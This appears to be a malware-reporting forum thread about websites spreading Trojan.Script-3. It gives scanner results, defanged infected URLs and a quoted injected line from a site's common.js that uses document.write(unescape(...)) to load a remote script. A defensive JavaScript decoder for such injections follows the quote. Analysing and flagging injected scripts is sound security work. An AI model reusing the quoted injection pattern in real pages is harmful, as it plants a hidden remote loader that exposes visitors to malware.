What is Trojan.Script-3

VW detects here:
Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/portal.php
Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/member.php?mod=register
Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/member.php?
Bitdefender TrafficLight flags the site as malicious.
A backdoor trojan that spreads from infested sites via, for instance, pop-up ads, and that boots with Windows boot; it may enable an attacker to release commands and remotely monitor the infested PC, and also act as an info-stealer.
See: https://www.virustotal.com/nl/url/fb146ab5ee96aadf8b3eb2bbe37151cb6e187fde6ee75ff89991d8dff4867a17/analysis/1404726792/
See: http://sharingmyip.com/?site=515515.net
Not being detected by this recommended scanner :o → http://sitecheck.sucuri.net/results/515515.net/portal.php

polonus

html
https://www.metascan-online.com/en/scanresult/file/a8e8aa15dacb4737aa9ec07201c9e26b

php
https://www.metascan-online.com/en/scanresult/file/400f7492fbec46678598fd09ddf180cf

Another site that spreads Trojan.Script-3: htxp://0411dd.com/list.php?catid=31&page=&page=&page=&page=50
Vulnerable - custom errors fail ->: https://asafaweb.com/Scan?Url=0411dd.com%2Flist.php%3Fcatid%3D31 (microsoft-iis/7.5)
Web Security Test reveals:
javascript check flags: Suspicious
Included script check flags:
Suspect - please check list for unknown includes
Suspicious Script:
0411dd dot com/images/js/common.js
document.write(unescape("%3cscript src='htxp://s.tkurl.com/navigatoral.js' type='text/javascript'%3e%3c/script%3e"));
External links check:

Site rep index 40 - Status: Suspicious 0411dd dot com, 121.198.156.169, ns15.xincache dot com, Parked/expired

polonus
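
The `document.write(unescape(...))` line quoted in the post above can be decoded statically, without running it, to show which external script it pulls in. This is an added example, not part of the original thread or of any scanner mentioned in it; the function names and the sample input are constructed for illustration, and the URL is kept defanged as on the page.

```javascript
// Added example: statically decode document.write(unescape("...")) injections.
// The scanned source is only pattern-matched, never evaluated.

// Decode %XX and %uXXXX the way legacy unescape() does, without calling it.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (_, u, h) =>
    String.fromCharCode(parseInt(u || h, 16)));
}

// Host part of a URL; accepts the defanged "htxp" scheme used on this page.
function hostOf(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#:]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Find every document.write(unescape("...")) call in `source`, decode its
// argument, and report <script src> URLs whose host differs from pageHost.
function findInjectedIncludes(source, pageHost) {
  const call = /document\.write(?:ln)?\s*\(\s*unescape\s*\(\s*(["'])((?:\\.|(?!\1).)*)\1\s*\)\s*\)/gi;
  const findings = [];
  let m;
  while ((m = call.exec(source)) !== null) {
    const decoded = decodeEscapes(m[2]);
    const src = /<script\b[^>]*\bsrc\s*=\s*(["'])(.*?)\1/gi;
    let s;
    while ((s = src.exec(decoded)) !== null) {
      const host = hostOf(s[2]);
      findings.push({
        decoded,
        src: s[2],
        host,
        thirdParty: host !== null && host !== pageHost.toLowerCase(),
      });
    }
  }
  return findings;
}

// Constructed sample modelled on the common.js line quoted above.
const sample = [
  'var a = 1;',
  'document.write(unescape("%3cscript src=\'htxp://s.tkurl.com/navigatoral.js\' type=\'text/javascript\'%3e%3c/script%3e"));',
  'document.write("<p>plain write, not flagged</p>");',
].join('\n');

for (const f of findInjectedIncludes(sample, '0411dd.com')) {
  console.log(`${f.thirdParty ? 'third-party' : 'same-host'} include: ${f.src}`);
}
```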

Hi Pondus,

So the attack code is typically flagged for portal.php → htxp://www.cyberarmy.in/2011/01/portal-hacking-dnn-website-hacking.html
& “%3e%3c/script%3e” is being used in tracking code.
avast! Webshield detects JS:ScriptXE-inf [Trj] in the browser executable.

pol